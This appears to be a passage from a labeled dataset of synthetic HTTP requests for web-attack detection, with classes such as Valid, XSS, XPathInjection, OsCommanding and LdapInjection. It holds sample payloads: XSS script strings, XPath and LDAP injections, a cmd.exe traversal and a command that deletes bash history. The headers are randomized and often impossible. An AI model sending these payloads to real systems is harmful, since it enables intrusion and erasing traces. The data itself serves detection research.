If-Modified-Since: Mon, 09 Aug 04 14:48:03 UTC
If-Unmodified-Since: Tue, 21 Jul 09 22:36:21 UTC
If-Match: *
If-None-Match: "SCzzi0jhYVrThPd6"
If-Range: "XvmFFoD-nhkJnztUDj."
Max-Forwards: 77
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM b2VidHBvYXRlaHlodDB3OHJzcjNwb250d0VjaGFSR3hudGdlaGllck9vbjlhdw==
Authorization: Basic bm90NDRvdzppdG5nc2hy
Range: 877-
Referer: http://www.f1ao.st/mxsi/dakgcheh/oE9e/dutNqih/stcxnedm.php4
TE: deflate
Trailer: If-None-Match
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 8.3; eh-oa; rv:1.9.1) Gecko/06604024
UA-CPU: x86
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2533x094
Via: 4.9 www.aYbte5.png
Transfer-Encoding: deflate
Upgrade: rute/4.1, nnxcu/9.0, tateem/4.5, gelU8/2.5
Warning: 151 146.124.39.49:89 "lAPnn" "Sat, 02 Jul 05 07:47:23 GMT"
X-Forwarded-For: 206.2.157.2
X-Serial-Number: 6248671751419598
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20549
Start - Id: 47865
class: XSS
GET /Sniftn/nbEUJu9mAo61fq./s9DNo0QwCT923NI3xq_/eti/ns79G/0VsDn0wp-V@/8J/ierteciiutya7d.aspx?eTy6otseoehd=9449871225&eekaetoO77eceT=sdP&hgwhhf1itdiha3e=49&lntyHofjbrtt=script++alert+%28eemi7e.nuqtT%29script+++&Uhttps74where0dBclib=detoqbid&DiRCmjCRH=86&tuulEw=49258&BcXrRm9=uodloEoaRpnWSReen&7qaiir5bek=XhtherSe0i&miro=50&idXdeleteE=5zba1x2rtoe9&ehsaee=nnoryt&Ji=iRroh+agdsy&uhgs9epOItork=qtxpei8ai20rs&SSelnisfznttYna=sdFqqp7fwJLt HTTP/1.0
Host: 176.109.43.203
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.5
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 5.197.242.191
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="8"
Date: Fri, 26 Sep 08 12:34:06 CET
ETag: "7FkK8i3Djc70HRyX"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: wu4c60i@McindieetT.fr
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Fri, 08 Jun 07 08:21:19 GMT
If-Match: *
If-None-Match: *
If-Range: "LT1pU7QIvOSM@Aaau"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: seid10 cgreft=hgtii8If
Authorization: Digest algorithm=MD5-sess
Range: 541-3,060-23987,670-3
Referer: http://etaiu.it/1niuleu3/Egeavls/meosdele/ovuy/2hist0e.png
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.4 (X11; U; Solaris 3.5; rI-oi; rv:2.8.3) Gecko/63768397
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: compress
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 546 www.taehteaa.gif "qmeXpetfcrEeeEci" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47865
Start - Id: 49248
class: XPathInjection
GET /nd/srbGbeench/OusrCwDLJiwGaoS/nri/5zS8/adP69xxWguDZop/dKX6Ho@x_1E@/tog4ijefqhsl/itAB00U_AOjh5sLQm60./egdG7d9T.js?7n2htwnser=%7Cunion%5Br&nhttrrl=41+++++or+++ihsF%2FolicMm%2Fg%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D++++or+80%3D HTTP/1.0
Host: 92.39.55.135
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-950, windows-1250;q=0.8, iso-8859-2;q=0.8
Accept-Encoding: 
Accept-Language: dt5-c;q=0.1, e-tEeiDes, dn-9ndsr, 68tusc-mcdscWdg;q=0.0, eenuvsqr-uhll
Cache-Control: no-transform
Client-ip: 247.83.20.197
Cookie: ialhhecnt=Enietcm|erp~positionzz;ic=24;pouydioiZr=12214
Cookie2: $Version="1"
Date: Mon, 05 Jan 09 23:18:09 CET
ETag: "H1R.iGgL4UA_bh.Cb"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Sun, 29 Feb 04 03:50:03 CET
If-Unmodified-Since: Sat, 02 Jan 10 18:44:13 CET
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Tue, 04 Mar 08 12:27:06 UTC
Max-Forwards: 251
MIME-Version: 6.6
Pragma: ibgsvkee=n
Proxy-Authorization: Digest nonce
Authorization: hvmos enswddc=rcerl
Range: 673-,-741678,577-
Referer: /eSee.gz
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: Mozilla/7.4 (compatible; Konqueror/8.0; Open BSD i586; dehnl9a; iootdm0n; IiS4riPEt)
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: gzip
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 272 www.ineutIx.jpg:5 "asndsepgt" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49248
Start - Id: 23253
class: Valid
GET /aOZCFgYgHKM3PVaMmF.shtml?lB08ogqGls=gt2andbr%3Beolrl&leEAehnsrkeftn=ycatinreplace2&sstroane2eN=+vbscriptezi%29%3B&te8rcaw=rMA1LwUBGv&eooJnOES0kdeTh=8XU&YSdandihlinkzw=eD&mgrNwetg=c%3Br&aQWS5.4GpasswdA4etc=05595&meCnuioReurjhe=Sabody02R%7Ei%40er&oU=d-Hxa&us5IhlaRkeKg=e1window.openc2anmselect7&ieeddqem=28446&connect.ZftpcatgisJjM=esz5&we=94&srvmr9=oruGmipk HTTP/1.0
Host: 38.219.28.236
Connection: laieyh8
Accept: */*
Accept-Charset: iso-2022-kr;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 42.166.49.181
Cookie: allOm@D=52;asha5y=5279096;dTViJA=15;ucesnRcgo=tc3ossIy&mb;tiefel=\:awdacen;y0UorEma0wo=7546449429
Cookie2: $Version="0"
Date: Tue, 03 Apr 07 18:02:24 CET
ETag: W/"4Vez3-g0IHgz9o4jot"
Expect: 100-continue
From: sebe@tnldorehze.de
If-Modified-Since: Tue, 02 Oct 07 23:57:40 UTC
If-Unmodified-Since: Thu, 16 Jul 09 04:27:30 UTC
If-Match: *
If-None-Match: "KtMq6yPrGqLVqGwCWl"
If-Range: *
Max-Forwards: 884
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: NTLM YVN3aXJwbHR1c2k1d3d0ZXpwdGVqaGVNMXppbjBlZWFobG5saG9ycWVpMmxzcg==
Range: 3-988
Referer: http://tis27aS.net/nrsnso6/rt0juu/wgdo.asmx
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 7.8; rb-1s; rv:1.6.3) Gecko/57820045
UA-CPU: StrongARM
UA-Disp: 831,695,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: FTP/0.3 www.rhad2e3.html, cd5/2.7 164.229.143.96
Transfer-Encoding: osdF; kSlp=dcot
Upgrade: atinoz/5.3, liht/0.8, qeeon/5.8, aucer/1.3
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 045569580616206660
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23253
Start - Id: 27256
class: Valid
GET /mUZjZqm3WweWf-mgIQ/cyN.Z.8Qt/datynsSeabnis/q6cbStNeSZyjt/Ihoco80at/tY@SN@YCnZHGtc7/WOvmprocessing-instruction@NP_/07lscatbgsoundI4bNt./tqdeAlTdneGtAc6ee.htm?sisrr=%2B&Olatayanri6=bsio&u2liZbmhpo=bdoDqcyMli&haa2eiaEs=24mJp&anjzzktoennktu=Aasiod%3Bg+wowoh&eGhtaaaE1be2k3=438111 HTTP/1.1
Host: 249.232.135.105:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: s='aO'
Client-ip: 180.216.200.241
Cookie: ncbKLuiMservices=aGD;Izxarnnoa6n6uet=Euj;ay6n=g$9B;bog=Sh$gtu<>u0ewhere;eessamCr(
Cookie2: $Version="29"
Date: Fri, 18 Apr 08 05:40:10 UTC
ETag: W/"6lB6Ey5_BVjt-eJ4ANhT"
Expect: pwheml=emo4nORl
From: rted@eseO4iri7.net
If-Modified-Since: Thu, 09 Sep 04 21:36:07 CET
If-Unmodified-Since: Thu, 20 May 04 12:18:04 GMT
If-Match: "6vfcp8dKybV0yzWi21"
If-None-Match: *
If-Range: *
Max-Forwards: 602
MIME-Version: 4.6
Pragma: a3nli9='iddnwr'
Proxy-Authorization: Digest uri=http://www.yonersA.it/viliere/nase/ataasc/2ehf/a6te.js
Authorization: Basic aWFha2FpbjphSTFlb28=
Range: -7
Referer: /xtrfdnHo/4eiKi.cfm
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Match
User-Agent: Mozilla/4.4 (Windows; U; WinNT 8.4; s5-rn; rv:4.4.2) Gecko/42885817
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8847x8709
Via: FTP/4.0 www.u4jteto.htm, 9.7 95.53.8.67
Transfer-Encoding: deflate
Upgrade: afs/5.2
Warning: 401 www.sbfs.jpeg "cs4fiar" "Thu, 05 Jul 07 13:41:31 GMT"
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 03585265611938930040
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 27256
Start - Id: 36437
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.Domneecb.gov
Connection: close
Accept: video/*, image/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.9, deflate;q=0.4, gzip;q=0.8, deflate;q=0.7, deflate
Accept-Language: Cit8veCg-ydal, ihneoa-sh, atu3vrlo-opr;q=0.7, t8Hp-wtito, taizf-pVS;q=0.4
Cache-Control: no-transform
Client-ip: 194.185.52.76
Cookie: tnEeRdl=602662574
Cookie2: $Version="63"
Date: Sat, 07 Aug 04 23:58:51 UTC
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Fri, 23 Jan 04 01:41:08 UTC
If-Unmodified-Since: Fri, 03 Jul 09 24:49:25 GMT
If-Match: "xvr.YIXbTvpInTW6fpAz"
If-None-Match: *
If-Range: Sun, 15 Jan 06 14:30:56 CET
Max-Forwards: 37
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: NTLM MWtjdWl1aXg2SWlwYmllZXRlZWhvaHBvdXl0ZWpjYWVodE9zYXJ0T3RlbWE=
Range: 51-
Referer: /lass.png
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 4.5; ma-jl; rv:8.6.3) Gecko/39443727
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color8
UA-Pixels: 006x6469
Via: ran/7.4 www.ml9ocat.jpeg, 7.0 www.ebswlm.jpeg
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36437
Start - Id: 33819
class: Valid
PUT /rg8C/o0ibddnjh6nt9/rsno7ency/cgKAlAfl/te/kS8N/mhKLsW/2e2azire8hsriirdE/t3.jsp? HTTP/1.0
Content-Length: 207
Content-Language: aEe,EtEz,y
Content-Encoding: identity
Content-Location: http://ant8te1h.de/etbn/dtatnlao.conf
Content-MD5: b2xkZXMzVHZ1cnNyZWNldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 May 05 08:10:26 UTC
Last-Modified: Sun, 20 Jul 08 06:06:45 GMT
Host: www.r8Igei8sn.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 83.229.81.254
Cookie: fvHHt1nHthTe=yT;miZh10iaccGC7N=h85b;onksw=smd0rrdreld;c5F2tr=g2dZMxqUqwlN
Cookie2: $Version="0"
Date: Wed, 29 Sep 04 02:47:48 CET
ETag: W/"h8XbejwtjHW_zUp_sf"
Expect: 100-continue
From: dmRxngT@spiuhlni.ch
If-Modified-Since: Sun, 15 Feb 04 21:23:11 UTC
If-Unmodified-Since: Wed, 19 Aug 09 05:13:35 UTC
If-Match: *
If-None-Match: "s7PiIuKh2pFCmQQtxC"
If-Range: Tue, 01 Nov 05 11:35:07 GMT
Max-Forwards: 1
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: nstsr eo5mtool=emmabEin
Authorization: NTLM cnd3dHNkZWlkYWlodGlobzBhdW50bmV5c3BoaGxSNW90aGl2bkphYw==
Range: 54-,81-
Referer: /ti3maij/aaua/thnrxcOz/lI8tr.ace
TE: deflate
Trailer: Trailer
User-Agent: nXbPj97.F http://www.hlmUu.cz
UA-CPU: Sparc
UA-Disp: 465,2154,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 301x2853
Via: 9.6 177.188.135.79:40, 9.5 www.pO4gl.png, FTP/4.3 www.esa0.jpg
Transfer-Encoding: gzip
Upgrade: ncln/7.1
Warning: 284 www.oftu.gif "feaaeesdct7" 
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 0148063102
----: ----------------
~~~~~: ~~~~~~~~~~~~~

apsk=9250615&ismc8s=tnavB4jrdLst&henfh1cS=eoca|Mend\+m]ametas&e0RCE=1&hn91-IZF=sSCch4ttta1&bhhrNiuO5MnG=sk]s&3gwl=ytioioz1u1osr5Wpg&spa=9&OlkyanxoHhs=a3vi9QLhP&dn=jseeeiiloxxieit&dloga-uLlmS=shg 8E

End - Id: 33819
Start - Id: 24958
class: Valid
GET /mhHee4GaoprCow/oHwC7O7ipvdq/dtj9anensiEd/btrm5sucdniismaha/fQEYKkD/c4s28A/tivf4Y_Viidzs.sh?qaahrOafdbiDi=07141713&htaccesd4P=0103590&ii=586&wtRnnosoathpy=Ei&mutyXdrllr4=%2Ba%2Bcpall&nlehmd=hotmpCnaafucmdIg&nmbarmgrhyte1=arttab0gSo&laae9otnr3=tmpdtoFi0tcre&opfEMwOrnarj=5JnddA4&s8s=nbgsoundlocationrkzsR%3Aisduypr3eg&dtta4mhlhe=182&x5mhwla=Eed&sflmsitrpwez=rtJw%29&pao8abseoeobD=srfm+esroupdateBnbsr HTTP/1.0
Host: www.m7cknMoo6.it
Connection: close
Accept: text/*, application/x-tar, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ro7ha-xnvTil;q=0.8, dlr5rn-e
Cache-Control: no-store
Client-ip: 115.80.65.226
Cookie: gn=028661;GcexecoB08HYqr=sqRaejue;y3Soth=6;ixss6wPh=emc56pczr
Cookie2: $Version="2"
Date: Sat, 02 Dec 06 22:59:16 GMT
ETag: W/"SImW8X_MZ.SowaC"
Expect: 100-continue
From: iefmllR@anati.de
If-Modified-Since: Sat, 24 Jul 04 14:03:27 CET
If-Unmodified-Since: Fri, 08 Oct 04 03:51:29 UTC
If-Match: "kJm9oWSvONaLohpR6"
If-None-Match: "6q7fPJucTdIQXOl@fAr"
If-Range: Thu, 22 Jul 04 20:58:34 CET
Max-Forwards: 2
MIME-Version: 4.9
Pragma: cncvtn6a=reiytf
Proxy-Authorization: n8ohs yni7udA=a49uin
Authorization: NTLM Y2JhbGU1a2ltdW4waXdZb3JvcmFhaWxhNmJzZWFvaXRUczFveWlyQW5lZWhpZWVq
Range: -652846
Referer: http://www.gyAw.net/nutqta.js
TE: trailers,trailers
Trailer: Trailer
User-Agent: ynkeoogZ (av6Mdb.TXA; 5NaRPiTc; oJ6ptXag49)
UA-CPU: PowerPC
UA-Disp: 028,484,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: HTTP/8.6 www.hu2ari.tiff
Transfer-Encoding: deflate
Upgrade: 3bda/0.6, httrt3/8.5, bqt/6.9
Warning: 902 www.Gitid.gif "iWeycozpaosdfoQobt5" 
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 2466804840974150
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24958
Start - Id: 37534
class: LdapInjection
POST /xinsert.MnVZ/o5n5djYCA0CR1/jrehr/ilJLQNAGa5ebgsoundCN.shtml? HTTP/1.1
Content-Length: 105
Content-Language: evs,alq,Ecdds
Content-Encoding: deflate
Content-Location: /cVthDOt.dll
Content-MD5: ZW9hNm9ybm9lbmR0Yk55aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Tue, 23 Oct 07 10:56:24 GMT
Host: 4.211.200.125:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.9, windows-874;q=0.3
Accept-Encoding: 
Accept-Language: vdt297-am0;q=0.9, blbht0w-ih
Cache-Control: min-fresh=3
Client-ip: 133.128.23.213
Cookie: qNi_LslQinwinnte=?10;bosndNetiaetu=|hb;ZexbSYTautoexecQ.=mVZ5rjCUn;cumvs80av=oQYczt-;NlLMelathhru=tqhctDhclunh
Cookie2: $Version="02"
Date: Wed, 09 Apr 08 01:29:51 CET
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: "mx6513s4eb7GsNrm"
If-None-Match: "o@X5y-IYqeEBjommG"
If-Range: Sat, 11 Aug 07 18:52:56 CET
Max-Forwards: 06
MIME-Version: 9.7
Pragma: aisGoeti='h'
Proxy-Authorization: rertml hneO5=eocht
Authorization: Digest realm
Range: 0516-7855,069180-,334-
Referer: http://www.hehhs6ty.ch/tHaml6a/csam/h1Qaa/q4oTbu/bvi5.mdb
TE: chunked
Trailer: TE
User-Agent: tAoEddR http://www.7ealEw8t.fr
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 1.2 119.3.52.102
Transfer-Encoding: deflate
Upgrade: njD/1.9
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

zlaoutSsom=)    (|(displayName=had*)  (name=had* )(   mail=had* )&ql.xVMJIKGE=aaj

End - Id: 37534
Start - Id: 31055
class: Valid
GET /tA/ekl/eSC05W-uDV/00tmpRk-KRyQZ/2uus4otxatnbt/UiptenfniArhd2y/menx/5yLemhVsKVP/orizi.htm?iaotlti=%40ma+rao+1dn&@mMdljS=5&w8smrcsareqiare=sMDH3hUnRq&ner=19259&ytnewfand=23065&bea8eil=5203&towlhrsM=2&cOo2mlhwD=zhK%40iibhY9r&t0rtTtuR8=4210998&gmslht=nagoll0bfuyeqhrsi&di7HeY84soaroq=4rrOiogirsiiwyt&tseym5s2eiree=9&tawsr3in57s=8i%7E%5Ca&Vqg@Uimg9dpassthru=e+L2erlogov36hoC4ttselectq HTTP/1.0
Host: 86.192.219.13
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aj-i, tr-sapmiweh;q=0.7, Tot82yh-0Mn5cot;q=0.1, hra-b;q=0.7
Cache-Control: no-transform
Client-ip: 70.205.14.32
Cookie: N8@S8i8=2
Cookie2: $Version="664"
Date: Wed, 26 Mar 08 16:19:51 UTC
ETag: W/"eyjfu3njn-uYg207"
Expect: rwce
From: 7hh6G@iXrAni.uk
If-Modified-Since: Sun, 03 Oct 04 15:29:06 UTC
If-Unmodified-Since: Tue, 04 Oct 05 03:21:57 GMT
If-Match: *
If-None-Match: "gWoT-6gtVpk8kZdANp2"
If-Range: *
Max-Forwards: 3994
MIME-Version: 4.2
Pragma: dssliFss=sr
Proxy-Authorization: NTLM ZWhlZmhhc251c29laGdvdW9heGxlck5lMnI3cmRzOGVlYXViZWVq
Authorization: Digest uri=http://smnho5r.de/tess/9m8alon/r0icddn/q7tuL.php4
Range: -14
Referer: http://tislvd.cz/rert8/azlrh/icPti/6ur7uupe.ace
TE: deflate,trailers
Trailer: Accept-Encoding
User-Agent: ar8eYq http://www.ldef.net
UA-CPU: 68000
UA-Disp: 7666,0977,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8182x6373
Via: FTP/4.1 www.tesxie.jpg
Transfer-Encoding: compress
Upgrade: tny/2.1, rfrn/3.6, tcwti/6.2, e6j5i/2.4, oeelce/7.1
Warning: 836 www.egnAek.shtml:406 "erkeES8uldsfsrytaIhi" "Sun, 28 Aug 05 15:14:21 CET"
X-Forwarded-For: 212.22.173.189
X-Serial-Number: 138515408970
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 31055
Start - Id: 19297
class: Valid
GET /sJboxq/eKIKVwFHW2qP30-e/aeEZqDMTruR/2uU0FWMy57IK.msf?s7edEIedsEBce=d HTTP/1.0
Host: 65.93.143.176:63577
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-2022-jp;q=0.3, iso-8859-8;q=0.7, x-mac-korean
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 74.7.105.82
Cookie: EaL=1;ptaoeowavd=5wa
Cookie2: $Version="745"
Date: Fri, 20 Oct 06 24:34:23 GMT
ETag: "gqrkG_IDYk7lrKmy"
Expect: 100-continue
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 26 Jan 10 16:57:17 CET
If-Unmodified-Since: Sun, 22 Jan 06 10:15:11 CET
If-Match: "2LFUvTrTRYgZ9vh63X"
If-None-Match: *
If-Range: Sat, 06 Jun 09 03:46:21 GMT
Max-Forwards: 1737
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM MWlEbGV0YW1aaEVnNUdZeHQxb2hhb2RvaEhybmVkaXlsZGU1STM=
Authorization: Basic b2d0aGl0ZWk6aGhoN2VoZWE=
Range: 418-281288
Referer: http://www.eLumau3d.be/oS1omiam.cfm
TE: deflate;q=0.5,trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.8 (Windows; U; Windows NT 8.1; bn-q2; rv:1.0.9) Gecko/25879156
UA-CPU: 68000
UA-Disp: 5257,2736,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 769x363
Via: HTTP/3.1 www.bimts7ba.css, HTTP/4.9 129.94.53.196, FTP/6.2 www.uay3vogh.tiff
Transfer-Encoding: compress
Upgrade: earoeu/7.9, ifetz/3.5, tges/2.9, Heu/7.4, ihfoks/9.4
Warning: 303 143.220.33.216 "entfvdtChoEcrKgtdi8" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19297
Start - Id: 49827
class: XPathInjection
GET /zB-shutdown1JCVZ7/ceenaEl/fuHrcsvO5zKFGt19aW/aMVu77MVD/4bxie-PH.JDojdiP_RIp/.ekd4C4o/XC_3uR/3pLG6TN/audcchhi0/OtiVuwehostitoa/Du1nehfseha/nitceta6ro5ga.htm?3niseunuiy89yzl=28209&wo6oo4sddiisoaa=nlha&nr=atfidatbelryi&lVtstdinp.divVAjd=9310580417&erAjulirr=m%3Ba&P4-S8=%24ue&tie7neRatsh13o=mzsfcm&owbs=aqugahah%27+++++or+++oa%2Fae%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D68%5D++++or++++%27tTz%27++%3D++++%27&7easjrh3a=1&sedqarmmM=onheAdeiantA8tyt HTTP/1.1
Host: www.Dtcocnefet.it:7234
Connection: close
Accept: application/*, application/rtf
Accept-Charset: windows-1252;q=0.0
Accept-Encoding: 
Accept-Language: lpuoWEl-vtz, x0hedMrr-i;q=0.4
Cache-Control: max-age=280
Client-ip: 113.253.116.24
Cookie: 0sibelidrr=A8;3sittzGIYVx=ossen;btleRisinclibg=32
Cookie2: $Version="7"
Date: Sun, 12 Nov 06 22:52:25 GMT
ETag: W/"w.9GIbIX8mlsodZh"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Fri, 11 Jan 08 24:40:59 CET
If-Unmodified-Since: Sat, 23 Oct 04 10:59:50 CET
If-Match: "@VYXx_B.ty2TE6KS"
If-None-Match: "oaGOmk42r0VfPgn5P9kZ"
If-Range: "Tk_7pMYt2ZAAxSR"
Max-Forwards: 95
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: tsrcs a72hex=0oid87
Range: -29302
Referer: /aeE5amf/veEtoR/sjo6oZr.php
TE: chunked,trailers
Trailer: If-Range
User-Agent: to3n (eBDexz; 5q-wRo.vu)
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/7.4 131.11.242.180:49, 5.3 208.90.163.134, 5.4 www.losshehe.css
Transfer-Encoding: coalqt; lpietfo=dipdwS
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49827
Start - Id: 43049
class: OsCommanding
POST /bbtAzadoca4tAoata.sh? HTTP/1.0
Content-Length: 51
Content-Language: cov,esti
Content-Encoding: compress
Content-Location: http://www.4ltJi3.be/r3rt/cel1st/TSrd/uoanhN.pl
Content-MD5: YWF6RXNlc25XZGFjaHQ0bA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Feb 06 14:56:39 UTC
Last-Modified: Mon, 29 Mar 04 15:17:49 CET
Host: www.aiooeeryru.net
Connection: yewd
Accept: application/*;q=0.6
Accept-Charset: x-mac-hebrew;q=0.9, iso-8859-15, windows-1257, x-mac-ce;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: snNija-whars;q=0.0, ewkruts-iose
Cache-Control: no-cache
Client-ip: 241.8.137.249
Cookie: eCRcQV7=qWieoD7hdlsdcugTk;oniuy=etrq2tcIs;teN=6dlraow;asb=eoose7okaehvh6
Cookie2: $Version="392"
Date: Wed, 28 Jan 09 01:14:32 CET
ETag: "9_iNTBloZki0GevqWne"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Mon, 18 Aug 08 07:38:29 CET
If-Unmodified-Since: Sun, 30 Mar 08 18:38:01 GMT
If-Match: *
If-None-Match: "NS-oM20eC2jQsTJCdd"
If-Range: *
Max-Forwards: 6
MIME-Version: 1.6
Pragma: 17BRynI=sEn8ex
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: zsep nMmthn=eott2h
Range: -18591
Referer: http://www.ioshalrs.fr/srwti9ol.html
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: moStu2tyoe/4.7.8.2
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: nC5t/4.2 www.r4itTa.gif, FTP/1.9 www.9cwo.jpeg
Transfer-Encoding: gzip
Upgrade: tun3o/7.3, omna/4.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i9oseBsost='  ;   rm     ~/.bash_history;

End - Id: 43049
Start - Id: 16377
class: Valid
GET /vRMWWrE@0U0V6M/ebvTQpLMuYsMC/u@st1-/r0oiispetcBhtd.gif?qyasgf224M74E=ra0Y8uqUwlM&XqR6R=ezt&P4ya=eidconnectet HTTP/1.1
Host: www.8asvsib.biz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-6;q=0.1, cp-932;q=0.2
Accept-Encoding: gzip
Accept-Language: 8tesa1me-oclletc
Cache-Control: no-store
Client-ip: 240.84.81.255
Cookie: HyVeciwkm=7zrtjwcIS1-W
Cookie2: $Version="05"
Date: Tue, 03 May 05 11:54:49 UTC
ETag: "UQpj0l.t2C.cLR5g"
Expect: 100-continue
From: 6Inrs@onnmi15ye.gov
If-Modified-Since: Fri, 04 Dec 09 19:23:42 GMT
